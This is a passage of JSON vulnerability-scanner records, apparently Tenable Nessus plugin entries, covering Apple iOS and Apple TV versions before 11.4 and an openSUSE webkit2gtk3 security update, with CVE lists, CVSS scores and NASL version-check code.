prior to 11.4. It is, therefore, affected by multiple vulnerabilities.", "cvss3": {"score": 7.8, "vector": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"}, "published": "2018-06-07T00:00:00", "type": "nessus", "title": "Apple iOS < 11.4 Multiple Vulnerabilities (EFAIL)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2018-4100", "CVE-2018-4188", "CVE-2018-4190", "CVE-2018-4192", "CVE-2018-4194", "CVE-2018-4198", "CVE-2018-4199", "CVE-2018-4201", "CVE-2018-4202", "CVE-2018-4204", "CVE-2018-4211", "CVE-2018-4214", "CVE-2018-4215", "CVE-2018-4218", "CVE-2018-4221", "CVE-2018-4222", "CVE-2018-4223", "CVE-2018-4224", "CVE-2018-4225", "CVE-2018-4226", "CVE-2018-4227", "CVE-2018-4232", "CVE-2018-4233", "CVE-2018-4235", "CVE-2018-4237", "CVE-2018-4238", "CVE-2018-4239", "CVE-2018-4240", "CVE-2018-4241", "CVE-2018-4243", "CVE-2018-4244", "CVE-2018-4246", "CVE-2018-4247", "CVE-2018-4249", "CVE-2018-4250", "CVE-2018-4252", "CVE-2018-4330", "CVE-2018-4404", "CVE-2018-5383"], "modified": "2022-05-24T00:00:00", "cpe": ["cpe:/o:apple:iphone_os"], "id": "APPLE_IOS_114_CHECK.NBIN", "href": "https://www.tenable.com/plugins/nessus/110398", "sourceData": "Binary data apple_ios_114_check.nbin", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-05-21T15:31:43", "description": "According to its banner, the version of Apple TV on the remote device is prior to 11.4. It is, therefore, affected by multiple vulnerabilities as described in the HT208850 security advisory.\n\nNote that only 4th and 5th generation models are affected by these vulnerabilities.", "cvss3": {"score": 7.8, "vector": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"}, "published": "2018-06-05T00:00:00", "type": "nessus", "title": "Apple TV < 11.4 Multiple Vulnerabilities", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2018-4188", "CVE-2018-4190", "CVE-2018-4192", "CVE-2018-4198", "CVE-2018-4199", "CVE-2018-4200", "CVE-2018-4201", "CVE-2018-4204", "CVE-2018-4206", "CVE-2018-4211", "CVE-2018-4214", "CVE-2018-4218", "CVE-2018-4222", "CVE-2018-4223", "CVE-2018-4224", "CVE-2018-4232", "CVE-2018-4233", "CVE-2018-4235", "CVE-2018-4237", "CVE-2018-4240", "CVE-2018-4241", "CVE-2018-4243", "CVE-2018-4246", "CVE-2018-4249", "CVE-2018-5383"], "modified": "2019-04-05T00:00:00", "cpe": ["cpe:/a:apple:apple_tv"], "id": "APPLETV_11_4.NASL", "href": "https://www.tenable.com/plugins/nessus/110325", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(110325);\n script_version(\"1.6\");\n script_cvs_date(\"Date: 2019/04/05 23:25:06\");\n\n script_cve_id(\n \"CVE-2018-4188\",\n \"CVE-2018-4190\",\n \"CVE-2018-4192\",\n \"CVE-2018-4198\",\n \"CVE-2018-4199\",\n \"CVE-2018-4200\",\n \"CVE-2018-4201\",\n \"CVE-2018-4204\",\n \"CVE-2018-4206\",\n \"CVE-2018-4211\",\n \"CVE-2018-4214\",\n \"CVE-2018-4218\",\n \"CVE-2018-4222\",\n \"CVE-2018-4223\",\n \"CVE-2018-4224\",\n \"CVE-2018-4232\",\n \"CVE-2018-4233\",\n \"CVE-2018-4235\",\n \"CVE-2018-4237\",\n \"CVE-2018-4240\",\n \"CVE-2018-4241\",\n \"CVE-2018-4243\",\n \"CVE-2018-4246\",\n \"CVE-2018-4249\",\n \"CVE-2018-5383\"\n );\n script_bugtraq_id(\n 103957,\n 103958,\n 103961,\n 104378\n );\n script_xref(name:\"APPLE-SA\", value:\"APPLE-SA-2018-6-01-6\");\n\n script_name(english:\"Apple TV < 11.4 Multiple Vulnerabilities\");\n script_summary(english:\"Checks the build number.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Apple TV device is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"According to its banner, the version of Apple TV on the remote device\nis prior to 11.4. It is, therefore, affected by multiple\nvulnerabilities as described in the HT208850 security advisory.\n\nNote that only 4th and 5th generation models are affected by these\nvulnerabilities.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://support.apple.com/en-us/HT208850\");\n # https://lists.apple.com/archives/security-announce/2018/Jun/msg00003.html\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?0e8b8fb7\");\n # https://lists.apple.com/archives/security-announce/2018/Jul/msg00011.html\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?b0bb7d4f\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to Apple TV version 11.4 or later. Note that this update is\nonly available for 4th and 5th generation models.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2018-4241\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Mac OS X libxpc MITM Privilege Escalation');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2018/06/01\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2018/06/01\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/06/05\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:apple:apple_tv\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Misc.\");\n\n script_copyright(english:\"This script is Copyright (C) 2018-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"appletv_version.nasl\");\n script_require_keys(\"AppleTV/Version\", \"AppleTV/Model\", \"AppleTV/URL\", \"AppleTV/Port\");\n script_require_ports(\"Services/www\", 7000);\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"appletv_func.inc\");\n\nurl = get_kb_item('AppleTV/URL');\nif (empty_or_null(url)) exit(0, 'Cannot determine Apple TV URL.');\nport = get_kb_item('AppleTV/Port');\nif (empty_or_null(port)) exit(0, 'Cannot determine Apple TV port.');\n\nbuild = get_kb_item('AppleTV/Version');\nif (empty_or_null(build)) audit(AUDIT_UNKNOWN_DEVICE_VER, 'Apple TV');\n\nmodel = get_kb_item('AppleTV/Model');\nif (empty_or_null(model)) exit(0, 'Cannot determine Apple TV model.');\n\n# https://en.wikipedia.org/wiki/TvOS\n# 4th gen model \"5,3\" and 5th gen model \"6,2\" share same build\nfixed_build = \"15L577\";\ntvos_ver = '11';\n\n# determine gen from the model\ngen = APPLETV_MODEL_GEN[model];\n\nappletv_check_version(\n build : build,\n fix : fixed_build,\n affected_gen : make_list(4, 5),\n fix_tvos_ver : tvos_ver,\n model : model,\n gen : gen,\n port : port,\n url : url,\n severity : SECURITY_HOLE\n);\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-08-19T12:27:12", "description": "The version of Apple iOS running on the mobile device is prior to 11.4. It is, therefore, affected by multiple vulnerabilities.", "cvss3": {"score": 7.5, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H"}, "published": "2019-04-17T00:00:00", "type": "nessus", "title": "Apple iOS < 11.4 Multiple Vulnerabilities (EFAIL)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2018-4190", "CVE-2018-4199", "CVE-2018-4204", "CVE-2018-4218", "CVE-2018-4222", "CVE-2018-4232", "CVE-2018-4233", "CVE-2018-4246", "CVE-2018-5383", "CVE-2018-4227", "CVE-2018-4202", "CVE-2018-4237", "CVE-2018-4100", "CVE-2018-4238", "CVE-2018-4211", "CVE-2018-4241", "CVE-2018-4243", "CVE-2018-4249", "CVE-2018-4235", "CVE-2018-4240", "CVE-2018-4224", "CVE-2018-4225", "CVE-2018-4223", "CVE-2018-4226", "CVE-2018-4198", "CVE-2018-4192", "CVE-2018-4214", "CVE-2018-4201", "CVE-2018-4188", "CVE-2018-4215", "CVE-2018-4239", "CVE-2018-4250", "CVE-2018-4247", "CVE-2018-4221", "CVE-2018-4252", "CVE-2018-4244"], "modified": "2019-04-17T00:00:00", "cpe": ["cpe:2.3:o:apple:iphone_os:*:*:*:*:*:*:*:*"], "id": "700550.PRM", "href": "https://www.tenable.com/plugins/nnm/700550", "sourceData": "Binary data 700550.prm", "cvss": {"score": 5, "vector": "CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2022-03-27T15:55:00", "description": "This update for webkit2gtk3 to version 2.20.3 fixes the issues :\n\nThe following security vulnerabilities were addressed :\n\n - CVE-2018-12911: Fixed an off-by-one error in xdg_mime_get_simple_globs (boo#1101999)\n\n - CVE-2017-13884: An unspecified issue allowed remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted website (bsc#1075775).\n\n - CVE-2017-13885: An unspecified issue allowed remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted website (bsc#1075775).\n\n - CVE-2017-7153: An unspecified issue allowed remote attackers to spoof user-interface information (about whether the entire content is derived from a valid TLS session) via a crafted website that sends a 401 Unauthorized redirect (bsc#1077535).\n\n - CVE-2017-7160: An unspecified issue allowed remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted website (bsc#1075775).\n\n - CVE-2017-7161: An unspecified issue allowed remote attackers to execute arbitrary code via special characters that trigger command injection (bsc#1075775, bsc#1077535).\n\n - CVE-2017-7165: An unspecified issue allowed remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted website (bsc#1075775).\n\n - CVE-2018-4088: An unspecified issue allowed remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted website (bsc#1075775).\n\n - CVE-2018-4096: An unspecified issue allowed remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted website (bsc#1075775).\n\n - CVE-2018-4200: An unspecified issue allowed remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted website that triggers a WebCore::jsElementScrollHeightGetter use-after-free (bsc#1092280).\n\n - CVE-2018-4204: An unspecified issue allowed remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted website (bsc#1092279).\n\n - CVE-2018-4101: An unspecified issue allowed remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted website (bsc#1088182).\n\n - CVE-2018-4113: An issue in the JavaScriptCore function in the 'WebKit' component allowed attackers to trigger an assertion failure by leveraging improper array indexing (bsc#1088182)\n\n - CVE-2018-4114: An unspecified issue allowed remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted website (bsc#1088182) \n\n - CVE-2018-4117: An unspecified issue allowed remote attackers to bypass the Same Origin Policy and obtain sensitive information via a crafted website (bsc#1088182, bsc#1102530).\n\n - CVE-2018-4118: An unspecified issue allowed remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted website (bsc#1088182) \n\n - CVE-2018-4119: An unspecified issue allowed remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted website (bsc#1088182) \n\n - CVE-2018-4120: An unspecified issue allowed remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted website (bsc#1088182).\n\n - CVE-2018-4121: An unspecified issue allowed remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted website (bsc#1092278).\n\n - CVE-2018-4122: An unspecified issue allowed remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted website (bsc#1088182).\n\n - CVE-2018-4125: An unspecified issue allowed remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted website (bsc#1088182).\n\n - CVE-2018-4127: An unspecified issue allowed remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted website (bsc#1088182).\n\n - CVE-2018-4128: An unspecified issue allowed remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted website (bsc#1088182).\n\n - CVE-2018-4129: An unspecified issue allowed remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted website (bsc#1088182).\n\n - CVE-2018-4146: An unspecified issue allowed attackers to cause a denial of service (memory corruption) via a crafted website (bsc#1088182).\n\n - CVE-2018-4161: An unspecified issue allowed remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted website (bsc#1088182).\n\n - CVE-2018-4162: An unspecified issue allowed remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted website (bsc#1088182).\n\n - CVE-2018-4163: An unspecified issue allowed remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted website (bsc#1088182).\n\n - CVE-2018-4165: An unspecified issue allowed remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted website (bsc#1088182).\n\n - CVE-2018-4190: An unspecified issue allowed remote attackers to obtain sensitive credential information that is transmitted during a CSS mask-image fetch (bsc#1097693)\n\n - CVE-2018-4199: An unspecified issue allowed remote attackers to execute arbitrary code or cause a denial of service (buffer overflow and application crash) via a crafted website (bsc#1097693)\n\n - CVE-2018-4218: An unspecified issue allowed remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted website that triggers an @generatorState use-after-free (bsc#1097693)\n\n - CVE-2018-4222: An unspecified issue allowed remote attackers to execute arbitrary code via a crafted website that leverages a getWasmBufferFromValue out-of-bounds read during WebAssembly compilation (bsc#1097693) \n\n - CVE-2018-4232: An unspecified issue allowed remote attackers to overwrite cookies via a crafted website (bsc#1097693) \n\n - CVE-2018-4233: An unspecified issue allowed remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted website (bsc#1097693) \n\n - CVE-2018-4246: An unspecified issue allowed remote attackers to execute arbitrary code via a crafted website that leverages type confusion (bsc#1104169) \n\n - CVE-2018-11646: webkitFaviconDatabaseSetIconForPageURL and webkitFaviconDatabaseSetIconURLForPageURL mishandled an unset pageURL, leading to an application crash (bsc#1095611)\n\n - CVE-2018-4133: A Safari cross-site scripting (XSS) vulnerability allowed remote attackers to inject arbitrary web script or HTML via a crafted URL (bsc#1088182).\n\n - CVE-2018-11713: The libsoup network backend of WebKit unexpectedly failed to use system proxy settings for WebSocket connections. As a result, users could be deanonymized by crafted websites via a WebSocket connection (bsc#1096060).\n\n - CVE-2018-11712: The libsoup network backend of WebKit failed to perform TLS certificate verification for WebSocket connections (bsc#1096061).\n\nThis update for webkit2gtk3 fixes the following issues :\n\n - Fixed a crash when atk_object_ref_state_set is called on an AtkObject that's being destroyed (bsc#1088932).\n\n - Fixed crash when using Wayland with QXL/virtio (bsc#1079512)\n\n - Disable Gigacage if mmap fails to allocate in Linux.\n\n - Add user agent quirk for paypal website.\n\n - Properly detect compiler flags, needed libs, and fallbacks for usage of 64-bit atomic operations.\n\n - Fix a network process crash when trying to get cookies of about:blank page.\n\n - Fix UI process crash when closing the window under Wayland.\n\n - Fix several crashes and rendering issues.\n\n - Do TLS error checking on GTlsConnection::accept-certificate to finish the load earlier in case of errors.\n\n - Properly close the connection to the nested wayland compositor in the Web Process.\n\n - Avoid painting backing stores for zero-opacity layers.\n\n - Fix downloads started by context menu failing in some websites due to missing user agent HTTP header.\n\n - Fix video unpause when GStreamerGL is disabled.\n\n - Fix several GObject introspection annotations.\n\n - Update user agent quiks to fix Outlook.com and Chase.com.\n\n - Fix several crashes and rendering issues.\n\n - Improve error message when Gigacage cannot allocate virtual memory.\n\n - Add missing WebKitWebProcessEnumTypes.h to webkit-web-extension.h.\n\n - Improve web process memory monitor thresholds.\n\n - Fix a web process crash when the web view is created and destroyed quickly.\n\n - Fix a network process crash when load is cancelled while searching for stored HTTP auth credentials.\n\n - Fix the build when ENABLE_VIDEO, ENABLE_WEB_AUDIO and ENABLE_XSLT are disabled.\n\n - New API to retrieve and delete cookies with WebKitCookieManager.\n\n - New web process API to detect when form is submitted via JavaScript.\n\n - Several improvements and fixes in the touch/gestures support.\n\n - Support for the &ldquo;system&rdquo; CSS font family.\n\n - Complex text rendering improvements and fixes.\n\n - More complete and spec compliant WebDriver implementation.\n\n - Ensure DNS prefetching cannot be re-enabled if disabled by settings.\n\n - Fix seek sometimes not working.\n\n - Fix rendering of emojis that were using the wrong scale factor in some cases.\n\n - Fix rendering of combining enclosed keycap.\n\n - Fix rendering scale of some layers in HiDPI.\n\n - Fix a crash in Wayland when closing the web view.\n\n - Fix crashes upower crashes when running inside a chroot or on systems with broken dbus/upower.\n\n - Fix memory leaks in GStreamer media backend when using GStreamer 1.14.\n\n - Fix several crashes and rendering issues.\n\n - Add ENABLE_ADDRESS_SANITIZER to make it easier to build with asan support.\n\n - Fix a crash a under Wayland when using mesa software rasterization.\n\n - Make fullscreen video work again.\n\n - Fix handling of missing GStreamer elements.\n\n - Fix rendering when webm video is played twice.\n\n - Fix kinetic scrolling sometimes jumping around.\n\n - Fix build with ICU configured without collation support.\n\n - WebSockets use system proxy settings now (requires libsoup 2.61.90).\n\n - Show the context menu on long-press gesture.\n\n - Add support for Shift + mouse scroll to scroll horizontally.\n\n - Fix zoom gesture to actually zoom instead of changing the page scale.\n\n - Implement support for Graphics ARIA roles.\n\n - Make sleep inhibitors work under Flatpak.\n\n - Add get element CSS value command to WebDriver.\n\n - Fix a crash aftter a swipe gesture.\n\n - Fix several crashes and rendering issues.\n\n - Fix crashes due to duplicated symbols in libjavascriptcoregtk and libwebkit2gtk.\n\n - Fix parsing of timeout values in WebDriver.\n\n - Implement get timeouts command in WebDriver.\n\n - Fix deadlock in GStreamer video sink during shutdown when accelerated compositing is disabled.\n\n - Fix several crashes and rendering issues.\n\n - Add web process API to detect when form is submitted via JavaScript.\n\n - Add new API to replace webkit_form_submission_request_get_text_fields() that is now deprecated.\n\n - Add WebKitWebView::web-process-terminated signal and deprecate web-process-crashed.\n\n - Fix rendering issues when editing text areas.\n\n - Use FastMalloc based GstAllocator for GStreamer.\n\n - Fix web process crash at startup in bmalloc.\n\n - Fix several memory leaks in GStreamer media backend.\n\n - WebKitWebDriver process no longer links to libjavascriptcoregtk.\n\n - Fix several crashes and rendering issues.\n\n - Add new API to add, retrieve and delete cookies via WebKitCookieManager.\n\n - Add functions to WebSettings to convert font sizes between points and pixels.\n\n - Ensure cookie operations take effect when they happen before a web process has been spawned.\n\n - Automatically adjust font size when GtkSettings:gtk-xft-dpi changes.\n\n - Add initial resource load statistics support.\n\n - Add API to expose availability of certain editing commands in WebKitEditorState.\n\n - Add API to query whether a WebKitNavigationAction is a redirect or not.\n\n - Improve complex text rendering.\n\n - Add support for the 'system' CSS font family.\n\n - Disable USE_GSTREAMER_GL\n\nThis update was imported from the SUSE:SLE-12-SP2:Update update project.", "cvss3": {"score": 9.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2018-10-26T00:00:00", "type": "nessus", "title": "openSUSE Security Update : webkit2gtk3 (openSUSE-2018-1288)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2017-13884", "CVE-2017-13885", "CVE-2017-7153", "CVE-2017-7160", "CVE-2017-7161", "CVE-2017-7165", "CVE-2018-11646", "CVE-2018-11712", "CVE-2018-11713", "CVE-2018-12911", "CVE-2018-4088", "CVE-2018-4096", "CVE-2018-4101", "CVE-2018-4113", "CVE-2018-4114", "CVE-2018-4117", "CVE-2018-4118", "CVE-2018-4119", "CVE-2018-4120", "CVE-2018-4121", "CVE-2018-4122", "CVE-2018-4125", "CVE-2018-4127", "CVE-2018-4128", "CVE-2018-4129", "CVE-2018-4133", "CVE-2018-4146", "CVE-2018-4161", "CVE-2018-4162", "CVE-2018-4163", "CVE-2018-4165", "CVE-2018-4190", "CVE-2018-4199", "CVE-2018-4200", "CVE-2018-4204", "CVE-2018-4218", "CVE-2018-4222", "CVE-2018-4232", "CVE-2018-4233", "CVE-2018-4246"], "modified": "2021-01-19T00:00:00", "cpe": ["p-cpe:/a:novell:opensuse:libjavascriptcoregtk-4_0-18", "p-cpe:/a:novell:opensuse:libjavascriptcoregtk-4_0-18-32bit", "p-cpe:/a:novell:opensuse:libjavascriptcoregtk-4_0-18-debuginfo", "p-cpe:/a:novell:opensuse:libjavascriptcoregtk-4_0-18-debuginfo-32bit", "p-cpe:/a:novell:opensuse:libwebkit2gtk-4_0-37", "p-cpe:/a:novell:opensuse:libwebkit2gtk-4_0-37-32bit", "p-cpe:/a:novell:opensuse:libwebkit2gtk-4_0-37-debuginfo", "p-cpe:/a:novell:opensuse:libwebkit2gtk-4_0-37-debuginfo-32bit", "p-cpe:/a:novell:opensuse:libwebkit2gtk3-lang", "p-cpe:/a:novell:opensuse:typelib-1_0-JavaScriptCore-4_0", "p-cpe:/a:novell:opensuse:typelib-1_0-WebKit2-4_0", "p-cpe:/a:novell:opensuse:typelib-1_0-WebKit2WebExtension-4_0", "p-cpe:/a:novell:opensuse:webkit-jsc-4", "p-cpe:/a:novell:opensuse:webkit-jsc-4-debuginfo", "p-cpe:/a:novell:opensuse:webkit2gtk-4_0-injected-bundles", "p-cpe:/a:novell:opensuse:webkit2gtk-4_0-injected-bundles-debuginfo", "p-cpe:/a:novell:opensuse:webkit2gtk3-debugsource", "p-cpe:/a:novell:opensuse:webkit2gtk3-devel", "p-cpe:/a:novell:opensuse:webkit2gtk3-plugin-process-gtk2", "p-cpe:/a:novell:opensuse:webkit2gtk3-plugin-process-gtk2-debuginfo", "cpe:/o:novell:opensuse:42.3"], "id": "OPENSUSE-2018-1288.NASL", "href": "https://www.tenable.com/plugins/nessus/118453", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from openSUSE Security Update openSUSE-2018-1288.\n#\n# The text description of this plugin is (C) SUSE LLC.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(118453);\n script_version(\"1.5\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/19\");\n\n script_cve_id(\"CVE-2017-13884\", \"CVE-2017-13885\", \"CVE-2017-7153\", \"CVE-2017-7160\", \"CVE-2017-7161\", \"CVE-2017-7165\", \"CVE-2018-11646\", \"CVE-2018-11712\", \"CVE-2018-11713\", \"CVE-2018-12911\", \"CVE-2018-4088\", \"CVE-2018-4096\", \"CVE-2018-4101\", \"CVE-2018-4113\", \"CVE-2018-4114\", \"CVE-2018-4117\", \"CVE-2018-4118\", \"CVE-2018-4119\", \"CVE-2018-4120\", \"CVE-2018-4121\", \"CVE-2018-4122\", \"CVE-2018-4125\", \"CVE-2018-4127\", \"CVE-2018-4128\", \"CVE-2018-4129\", \"CVE-2018-4133\", \"CVE-2018-4146\", \"CVE-2018-4161\", \"CVE-2018-4162\", \"CVE-2018-4163\", \"CVE-2018-4165\", \"CVE-2018-4190\", \"CVE-2018-4199\", \"CVE-2018-4200\", \"CVE-2018-4204\", \"CVE-2018-4218\", \"CVE-2018-4222\", \"CVE-2018-4232\", \"CVE-2018-4233\", \"CVE-2018-4246\");\n\n script_name(english:\"openSUSE Security Update : webkit2gtk3 (openSUSE-2018-1288)\");\n script_summary(english:\"Check for the openSUSE-2018-1288 patch\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote openSUSE host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"This update for webkit2gtk3 to version 2.20.3 fixes the issues :\n\nThe following security vulnerabilities were addressed :\n\n - CVE-2018-12911: Fixed an off-by-one error in\n xdg_mime_get_simple_globs (boo#1101999)\n\n - CVE-2017-13884: An unspecified issue allowed remote\n attackers to execute arbitrary code or cause a denial of\n service (memory corruption and application crash) via a\n crafted website (bsc#1075775).\n\n - CVE-2017-13885: An unspecified issue allowed remote\n attackers to execute arbitrary code or cause a denial of\n service (memory corruption and application crash) via a\n crafted website (bsc#1075775).\n\n - CVE-2017-7153: An unspecified issue allowed remote\n attackers to spoof user-interface information (about\n whether the entire content is derived from a valid TLS\n session) via a crafted website that sends a 401\n Unauthorized redirect (bsc#1077535).\n\n - CVE-2017-7160: An unspecified issue allowed remote\n attackers to execute arbitrary code or cause a denial of\n service (memory corruption and application crash) via a\n crafted website (bsc#1075775).\n\n - CVE-2017-7161: An unspecified issue allowed remote\n attackers to execute arbitrary code via special\n characters that trigger command injection (bsc#1075775,\n bsc#1077535).\n\n - CVE-2017-7165: An unspecified issue allowed remote\n attackers to execute arbitrary code or cause a denial of\n service (memory corruption and application crash) via a\n crafted website (bsc#1075775).\n\n - CVE-2018-4088: An unspecified issue allowed remote\n attackers to execute arbitrary code or cause a denial of\n service (memory corruption and application crash) via a\n crafted website (bsc#1075775).\n\n - CVE-2018-4096: An unspecified issue allowed remote\n attackers to execute arbitrary code or cause a denial of\n service (memory corruption and application crash) via a\n crafted website (bsc#1075775).\n\n - CVE-2018-4200: An unspecified issue allowed remote\n attackers to execute arbitrary code or cause a denial of\n service (memory corruption and application crash) via a\n crafted website that triggers a\n WebCore::jsElementScrollHeightGetter use-after-free\n (bsc#1092280).\n\n - CVE-2018-4204: An unspecified issue allowed remote\n attackers to execute arbitrary code or cause a denial of\n service (memory corruption and application crash) via a\n crafted website (bsc#1092279).\n\n - CVE-2018-4101: An unspecified issue allowed remote\n attackers to execute arbitrary code or cause a denial of\n service (memory corruption and application crash) via a\n crafted website (bsc#1088182).\n\n - CVE-2018-4113: An issue in the JavaScriptCore function\n in the 'WebKit' component allowed attackers to trigger\n an assertion failure by leveraging improper array\n indexing (bsc#1088182)\n\n - CVE-2018-4114: An unspecified issue allowed remote\n attackers to execute arbitrary code or cause a denial of\n service (memory corruption and application crash) via a\n crafted website (bsc#1088182) \n\n - CVE-2018-4117: An unspecified issue allowed remote\n attackers to bypass the Same Origin Policy and obtain\n sensitive information via a crafted website\n (bsc#1088182, bsc#1102530).\n\n - CVE-2018-4118: An unspecified issue allowed remote\n attackers to execute arbitrary code or cause a denial of\n service (memory corruption and application crash) via a\n crafted website (bsc#1088182) \n\n - CVE-2018-4119: An unspecified issue allowed remote\n attackers to execute arbitrary code or cause a denial of\n service (memory corruption and application crash) via a\n crafted website (bsc#1088182) \n\n - CVE-2018-4120: An unspecified issue allowed remote\n attackers to execute arbitrary code or cause a denial of\n service (memory corruption and application crash) via a\n crafted website (bsc#1088182).\n\n - CVE-2018-4121: An unspecified issue allowed remote\n attackers to execute arbitrary code or cause a denial of\n service (memory corruption and application crash) via a\n crafted website (bsc#1092278).\n\n - CVE-2018-4122: An unspecified issue allowed remote\n attackers to execute arbitrary code or cause a denial of\n service (memory corruption and application crash) via a\n crafted website (bsc#1088182).\n\n - CVE-2018-4125: An unspecified issue allowed remote\n attackers to execute arbitrary code or cause a denial of\n service (memory corruption and application crash) via a\n crafted website (bsc#1088182).\n\n - CVE-2018-4127: An unspecified issue allowed remote\n attackers to execute arbitrary code or cause a denial of\n service (memory corruption and application crash) via a\n crafted website (bsc#1088182).\n\n - CVE-2018-4128: An unspecified issue allowed remote\n attackers to execute arbitrary code or cause a denial of\n service (memory corruption and application crash) via a\n crafted website (bsc#1088182).\n\n - CVE-2018-4129: An unspecified issue allowed remote\n attackers to execute arbitrary code or cause a denial of\n service (memory corruption and application crash) via a\n crafted website (bsc#1088182).\n\n - CVE-2018-4146: An unspecified issue allowed attackers to\n cause a denial of service (memory corruption) via a\n crafted website (bsc#1088182).\n\n - CVE-2018-4161: An unspecified issue allowed remote\n attackers to execute arbitrary code or cause a denial of\n service (memory corruption and application crash) via a\n crafted website (bsc#1088182).\n\n - CVE-2018-4162: An unspecified issue allowed remote\n attackers to execute arbitrary code or cause a denial of\n service (memory corruption and application crash) via a\n crafted website (bsc#1088182).\n\n - CVE-2018-4163: An unspecified issue allowed remote\n attackers to execute arbitrary code or cause a denial of\n service (memory corruption and application crash) via a\n crafted website (bsc#1088182).\n\n - CVE-2018-4165: An unspecified issue allowed remote\n attackers to execute arbitrary code or cause a denial of\n service (memory corruption and application crash) via a\n crafted website (bsc#1088182).\n\n - CVE-2018-4190: An unspecified issue allowed remote\n attackers to obtain sensitive credential information\n that is transmitted during a CSS mask-image fetch\n (bsc#1097693)\n\n - CVE-2018-4199: An unspecified issue allowed remote\n attackers to execute arbitrary code or cause a denial of\n service (buffer overflow and application crash) via a\n crafted website (bsc#1097693)\n\n - CVE-2018-4218: An unspecified issue allowed remote\n attackers to execute arbitrary code or cause a denial of\n service (memory corruption and application crash) via a\n crafted website that triggers an @generatorState\n use-after-free (bsc#1097693)\n\n - CVE-2018-4222: An unspecified issue allowed remote\n attackers to execute arbitrary code via a crafted\n website that leverages a getWasmBufferFromValue\n out-of-bounds read during WebAssembly compilation\n (bsc#1097693) \n\n - CVE-2018-4232: An unspecified issue allowed remote\n attackers to overwrite cookies via a crafted website\n (bsc#1097693) \n\n - CVE-2018-4233: An unspecified issue allowed 